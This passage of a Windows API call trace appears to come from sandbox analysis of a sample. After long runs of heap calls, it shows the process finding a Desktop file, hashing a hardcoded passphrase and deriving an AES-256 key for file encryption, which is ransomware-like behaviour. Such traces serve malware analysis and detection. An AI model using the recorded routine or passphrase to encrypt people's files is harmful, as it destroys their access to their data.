0x43e26c0 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0128.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0128.623] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0128.623] FreeLibrary (hLibModule=0x772d0000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0128.623] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0128.624] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0128.625] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea268 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0128.625] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0128.625] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0128.625] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ce0 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392570 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21f0 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc98 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9128 | out: hHeap=0x1780000) returned 1 [0128.626] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0128.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0128.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0128.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0128.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0128.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0128.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0128.627] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0128.627] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0128.627] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x43c9d10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0128.627] CloseHandle (hObject=0x2a0) returned 1 [0128.627] FreeLibrary (hLibModule=0x772d0000) returned 1 [0128.627] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0128.628] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\_uPhYhD.png", lpFindFileData=0x144ed28 | out: lpFindFileData=0x144ed28*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x615f6a20, ftCreationTime.dwHighDateTime=0x1d5e38b, ftLastAccessTime.dwLowDateTime=0x59628850, ftLastAccessTime.dwHighDateTime=0x1d5f0ee, ftLastWriteTime.dwLowDateTime=0x59628850, ftLastWriteTime.dwHighDateTime=0x1d5f0ee, nFileSizeHigh=0x0, nFileSizeLow=0x3390, dwReserved0=0x43c34c0, dwReserved1=0x8, cFileName="_uPhYhD.png", cAlternateFileName="")) returned 0x41ac500 [0128.628] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0128.628] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.628] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.628] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0128.628] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.628] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0128.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x1796fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0128.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0128.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x1797108, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0128.628] CryptAcquireContextA (in: phProv=0x144ea08, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x144ea08*=0x41a5250) returned 1 [0128.629] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0128.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.629] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0128.629] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0128.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0128.629] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0128.629] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.629] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.629] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0128.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x43caa00, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0128.629] CryptCreateHash (in: hProv=0x41a5250, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x144e778 | out: phHash=0x144e778) returned 1 [0128.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0128.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e28a8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0128.630] CharLowerBuffW (in: lpsz="byte[34]", cchLength=0x8 | out: lpsz="byte[34]") returned 0x8 [0128.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0128.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="mimniasnfiwentientienternyeirynery", cchWideChar=35, lpMultiByteStr=0x17e2c08, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mimniasnfiwentientienternyeirynery", lpUsedDefaultChar=0x0) returned 35 [0128.630] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0128.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca9b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0128.630] CryptHashData (hHash=0x41ac2c0, pbData=0x17e2b48, dwDataLen=0x22, dwFlags=0x1) returned 1 [0128.630] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.630] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0128.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca7c0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0128.630] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac2c0, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac280) returned 1 [0128.630] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.630] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0128.630] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e28, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0128.631] CryptDestroyHash (hHash=0x41ac2c0) returned 1 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea268 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb060 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0128.631] RtlAllocateHeap (HeapHandle=0x1780000, 